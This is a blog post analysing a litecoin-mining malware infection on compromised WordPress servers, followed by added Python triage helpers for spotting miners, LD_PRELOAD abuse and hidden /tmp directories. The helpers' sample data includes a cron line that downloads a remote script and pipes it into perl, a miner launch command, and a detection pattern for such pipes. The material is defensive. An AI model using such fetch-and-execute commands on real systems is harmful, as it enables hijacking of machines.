Antonio Angelino

August 2017

Bitcoin mining malware, analysis of an infection

When an attacker manages to compromise a server or your notebook and gain root access, his main goal is usually to steal sensitive information, use the machine as a bridgehead for attacking other targets, send spam, or deny a service in order to cause financial losses.

When I started my sysadmin career more than ten years ago, almost all software exploits were used with the goals described above in mind, but something has been changing since crypto-currencies began to spread and gain real value.

Bitcoin is the most famous crypto-currency nowadays. Bitcoins can be obtained in exchange for legal currencies (dollar, euro, yen, yuan and so on) or as a reward for payment-processing work, in which you offer your computing power to verify and record payments in the public ledger. This activity is called mining and is rewarded with transaction fees and newly created bitcoins.

Bitcoin mining requires a huge amount of computing power, so miners usually build computing clusters in order to generate coins. Mining clusters can be heterogeneous: any kind of digital appliance connected to the Internet is a good candidate for joining the cluster. The more powerful the appliance's CPU (or GPU), the more valuable the appliance itself.

Attackers are starting to make profit by gaining access to servers, notebooks, smartphones or even simple appliances (smart washing machines, refrigerators, televisions, CCTV security cameras and so on) and stealing CPU/GPU cycles for mining crypto-currencies.

Mining bitcoins with a low-end CPU is practically impossible nowadays, but there are other crypto-currencies that are far easier to mine than bitcoin. That’s why attackers have been targeting litecoin and dogecoin, which are literally a million times easier to mine.

Trend Micro found mining malware in several Android apps, a couple of which were listed in the official Google Play store and had been downloaded by millions of users.

Johannes Ullrich realized that there was a network of CCTV security cameras that were being used to mine for dogecoin.

You can usually notice mining malware on a smartphone because of the loss of performance or its “puzzling” overheating, but you may not recognise a similar issue on a modern multi-core/multi-socket server. Mining malware tends to keep a low profile: even if it uses 100% of one core of a 12-core CPU, it is only using about 8% of the total CPU capacity and may go unnoticed.

Analysis of a mining malware infection

I found the scenario described above during two security audits requested by two different clients. More than 20 servers were being used to mine litecoin, all compromised using the same technique.

All of the compromised servers hosted vulnerable WordPress installations, which had been used to download and execute the following malicious PHP script.

The script contains an ELF malware library inside the $so32 variable (I removed it); it is used to change how /usr/bin/host behaves. You can see how the attacker “prelinks” (LD_PRELOAD) a bogus libworker.so before launching /usr/bin/host (a legitimate and clean system binary) by checking the highlighted line #37.

The attacker appears to use /usr/bin/host as a fallback for cron when cron access is denied.

The main features of this script are:

After a successful execution of the previous script, the server crontab of the audited servers looked like the following one:

Thanks to the first cron task, a remote Perl script was downloaded every 10 seconds. This is the source code of the last Perl script that was downloaded:

The script performs some cleanup tasks, checks the server environment, creates a hidden directory called “.ice-unix” inside /tmp, and then downloads and extracts a tar.gz file containing the minerd software. The last command of the script configures and launches the parasitic mining software.

The miner joins a mining pool called “wemineltc” through the stratum protocol and uses a random username from “spdrman.0” to “spdrman.11”.

The malware tries to camouflage itself by:

By checking the web server logs and the creation dates of several files and directories, I discovered that the parasitic mining processes had been running for 3 to 4 months and nobody had noticed!
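As an added example (not part of the original post and not the attacker's code), the following Python triage helpers check constructed sample data for the indicators described above: a process pinning a single core that looks small in aggregate, a cron entry piping remotely fetched content into an interpreter, LD_PRELOAD set in a process environment, and hidden dot-directories under /tmp. The pool host, IP address, PIDs and file names are invented placeholders.

```python
import re

# Constructed sample data (placeholders, not taken from the audited servers):
# a `ps -eo pid,%cpu,args` style snapshot, a crontab and /proc/<pid>/environ blobs.
SAMPLE_PS = """  PID %CPU COMMAND
  812  0.3 /usr/sbin/sshd -D
 1337 99.8 /tmp/.ice-unix/minerd -o stratum+tcp://pool.example:3333 -u spdrman.3
 2048  1.1 /usr/sbin/apache2 -k start
 4096 97.5 /usr/bin/host
"""
SAMPLE_CRONTAB = """*/5 * * * * /usr/bin/php /var/www/cron.php
* * * * * wget -q -O - http://203.0.113.10/x.pl | perl
"""
SAMPLE_ENVIRON = {
    "4096": "PATH=/usr/bin\x00LD_PRELOAD=/tmp/.ice-unix/libworker.so\x00HOME=/\x00",
    "812": "PATH=/usr/bin\x00HOME=/root\x00",
}
# wget/curl output piped straight into an interpreter, as the cron dropper did
FETCH_PIPE = re.compile(r"\b(wget|curl)\b.*\|\s*(perl|sh|bash|php|python)\b")

def cpu_hogs(ps_text, cores, threshold=90.0):
    """Processes pinning roughly one core. share_of_host shows why a global
    dashboard misses them: 99.8% of one core is about 8% of a 12-core machine."""
    hits = []
    for line in ps_text.splitlines()[1:]:          # skip the header row
        pid, cpu, cmd = line.split(None, 2)
        if float(cpu) >= threshold:
            hits.append({"pid": pid, "cmd": cmd,
                         "share_of_host": round(float(cpu) / cores, 1)})
    return hits

def suspicious_cron(crontab_text):
    """Crontab lines that download a remote script and execute it directly."""
    return [l for l in crontab_text.splitlines() if FETCH_PIPE.search(l)]

def preloaded_libs(environ_by_pid):
    """{pid: library} for processes started with LD_PRELOAD, as /usr/bin/host was."""
    found = {}
    for pid, blob in environ_by_pid.items():
        for entry in blob.split("\x00"):         # environ entries are NUL-separated
            if entry.startswith("LD_PRELOAD="):
                found[pid] = entry.split("=", 1)[1]
    return found

def hidden_tmp_paths(ps_text):
    """Dot-directories under /tmp referenced by running commands (e.g. /tmp/.ice-unix)."""
    return sorted({m.group(0) for m in re.finditer(r"/tmp/\.[^\s/]+", ps_text)})
```

On a live host, feed the functions the output of `ps -eo pid,%cpu,args`, `crontab -l` for each user, and the contents of `/proc/<pid>/environ`; every hit is a lead to examine by hand, not proof of infection.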

How to prevent similar threats?

You should keep the operating system and all user applications updated, harden your systems and schedule weekly security checks: looking at a global dashboard of overall resource statistics and installing rkhunter or similar tools does not guarantee that your servers won't become zombies manipulated by a remote puppet master.

Entrepreneur, Manager, Cloud Engineer.